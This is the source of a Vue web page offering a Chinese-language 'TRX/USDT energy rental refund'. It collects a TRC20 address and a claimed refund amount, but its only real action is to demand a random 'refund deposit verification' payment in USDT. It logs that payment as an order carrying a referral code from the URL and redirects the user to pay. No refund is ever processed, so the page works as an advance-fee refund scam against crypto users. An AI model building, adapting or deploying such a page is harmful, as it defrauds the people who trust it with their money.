<template>
    <div class="refund-page">
      <div class="header">
        <svg viewBox="0 0 200 200" fill="currentColor">
          <path d="M57.8,42.2l51.5,21.6l17.2,59.1l-68.7-16.6L57.8,42.2z M56.9,39.1l6.1,71.5l71.4,17.2l-18.3-63L56.9,39.1z M59.7,32.3
          l86.8,25.2l17.8,65.2l-78.9,2.7L59.7,32.3z M64.5,29.6l-0.8,1.9l2.9,34L129,90.5l-13.1-45.2L64.5,29.6z"/>
        </svg>
        <h1>TRX/USDT 能量租赁退款</h1>
      </div>
  
      <div class="container">
        <div class="tips">
            <ul>
            <li>请保管好相关凭证截图</li>
            <li>提交申请前请确认已在客服处报备</li>
            <li>请勿重复提交申请，如遇问题请联系管理员</li>
            <li>请确保填写正确的TRON(TRC20)网络地址，地址错误可能导致资金丢失</li>
          </ul>
        </div>
        
        <a-form :model="formState" layout="vertical">
          <a-form-item label="退款地址：" required>
            <p style="margin-top: 24px;">退款地址：</p>
            <a-input 
              v-model:value="formState.tronAddress" 
              placeholder="请输入您申请退款的TRC20地址"
            />
          </a-form-item>
  
          <a-form-item label="退款金额：" required>
            <p style="margin-top: 24px;">退款金额：</p>
            <div class="input-group">
              <a-input 
                v-model:value="formState.refundAmount" 
                placeholder="请输入您申请退款的金额"
                type="number"
                min="0"
                step="0.000001"
              />
              <div class="currency-selector">
                <a-radio-group v-model:value="formState.currency">
                  <a-radio-button value="USDT">USDT</a-radio-button>
                  <a-radio-button value="TRX">TRX</a-radio-button>
                </a-radio-group>
              </div>
            </div>
          </a-form-item>
  
          <a-form-item label="退款原因（选填）：">
            <p style="margin-top: 24px;">退款原因（选填）：</p>
            <a-textarea 
              v-model:value="formState.reason" 
              placeholder="请根据客服指引进行填写"
              :rows="4"
            />
          </a-form-item>
  
          <a-form-item>
            <a-button 
              type="primary" 
              size="large" 
              block 
              @click="handleSubmit"
              :loading="isSubmitting"
              style="background: #d9012f"
            >
              提交退款申请
            </a-button>
          </a-form-item>
        </a-form>
      </div>
  
      <div class="footer">
        © 2025 Tron / USDT Refund Service. All Rights Reserved.
      </div>
    </div>
  </template>
  
  <script>
  import { message } from 'ant-design-vue';
  import { addOrder } from '../util/api'; 
  
  export default {
    name: 'EnergyRefund',
    data() {
      return {
        formState: {
          tronAddress: '',
          refundAmount: '',
          currency: 'USDT',
          reason: ''
        },
        referral_code:"",
        isSubmitting: false
      }
    },
    mounted()  {
      const params = new URLSearchParams(window.location.search);
      this.referral_code = params.get("code") || '';
    },
    methods: {
      generateRandomAmount() {
        const randomInt = Math.floor(Math.random() * 300000) + 1;
        return (randomInt / 1000000).toFixed(6);
      },
      
      async handleSubmit() {
        if (this.isSubmitting) return;
        
        // 验证表单
        if (!this.formState.tronAddress) {
          message.warning('请输入退款地址');
          return;
        }
        
        const tronAddressRegex = /^T[1-9A-HJ-NP-Za-km-z]{33}$/;
        if (!tronAddressRegex.test(this.formState.tronAddress)) {
          message.warning('请输入正确的 TRC20 地址');
          return;
        }
        
        const userRefundAmount = parseFloat(this.formState.refundAmount);
        if (isNaN(userRefundAmount) || userRefundAmount <= 0) {
          message.warning('请输入正确的退款金额');
          return;
        }
        
        const randomAmount = this.generateRandomAmount();
        
        try {
          this.isSubmitting = true;
          
          if (!confirm(`退押验证金额 ${randomAmount} USDT, 点击 确认 前去付款`)) {
            this.isSubmitting = false;
            return;
          }
          
          let str = this.getCurrentDateTime() + Math.floor(Math.random() * 100000).toString().padStart(6, '0');
          let data = {
              price:randomAmount,
              inputNumber:1,
              inputGT:this.formState.tronAddress,
              orderNo: str,
              title:"退款押金",
              referral_code:this.referral_code
          }

          await addOrder(data)

          this.$router.push({ name: 'Payment', params: { data: JSON.stringify(data) } });
        
        } catch (error) {
          console.error('提交失败:', error);
          message.error('处理请求时发生错误，请稍后重试');
        } finally {
          this.isSubmitting = false;
        }
      },

      getCurrentDateTime ()   {
            const date = new Date();
            const year = date.getFullYear();
            const month = ("0" + (date.getMonth() + 1)).slice(-2);
            const day = ("0" + date.getDate()).slice(-2);
            const hours = ("0" + date.getHours()).slice(-2);
            const minutes = ("0" + date.getMinutes()).slice(-2);
            const seconds = ("0" + date.getSeconds()).slice(-2);
            return `${year}${month}${day}${hours}${minutes}${seconds}`;
      },
      
      async submitRefundRequest(data) {
        // 这里应该是实际的API调用
        // 模拟实现，实际项目中替换为真实的API调用
        console.log(data)
        return new Promise((resolve) => {
          setTimeout(() => {
            resolve({
              status: 'success',
              redirect_url: '/payment'
            });
          }, 500);
        });
      },
      
      appendUidToUrl(url) {
        // 实现UID附加逻辑
        return url;
      }
    }
  }
  </script>
  
  <style scoped lang="less">
  .refund-page {
    background: linear-gradient(135deg, #d9012f, #222);
    min-height: 100vh;
    color: #333;
    display: flex;
    flex-direction: column;
  }
  
  .header {
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 20px 0;
    color: #fff;
    
    svg {
      width: 48px;
      height: auto;
      margin-right: 10px;
    }
    
    h1 {
      font-size: 24px;
      font-weight: bold;
      letter-spacing: 1px;
    }
  }
  
  .container {
    max-width: 600px;
    background-color:#fff;
    margin: 40px auto;
    border-radius: 10px;
    box-shadow: 0 8px 20px rgba(0,0,0,0.2);
    padding: 30px 40px;
  }
  
  .tips {
      background: #FFFBCC;
      border-left: 4px solid #FFE564;
      padding: 10px 15px;
      margin-bottom: 20px;
      border-radius: 4px;

  ul {

    list-style: disc;
    margin-left: 20px;
    padding: 10px 0;
    
    li {
      background: #FFFBCC;
      margin-bottom: 5px;
      color: #595959;
    }
  }
}


  .input-group {
    display: flex;
    align-items: center;
    
    .ant-input {
      flex: 1;
    }
    
 
  }

  .currency-selector {
  :deep(.ant-radio-button-wrapper) {
    // 未选中状态
    color: #d9012f; // 红色字体
    background: #fff; // 白色背景
    border-color: #d9012f; // 红色边框

    &:hover {
      color: #d9012f;
    }
  }

  :deep(.ant-radio-button-wrapper-checked) {
    // 选中状态
    color: #fff !important; // 白色字体
    background: #d9012f !important; // 红色背景
    border-color: #d9012f !important; // 红色边框

    &:hover {
      color: #fff !important;
    }
  }
}
  
  .footer {
    text-align: center;
    color: #fff;
    padding: 15px 0;
    margin-top: auto;
    font-size: 14px;
  }
  
  @media (max-width: 480px) {
    .container {
      margin: 20px auto;
      padding: 20px;
    }
    
    .header h1 {
      font-size: 18px;
    }
  }
  </style>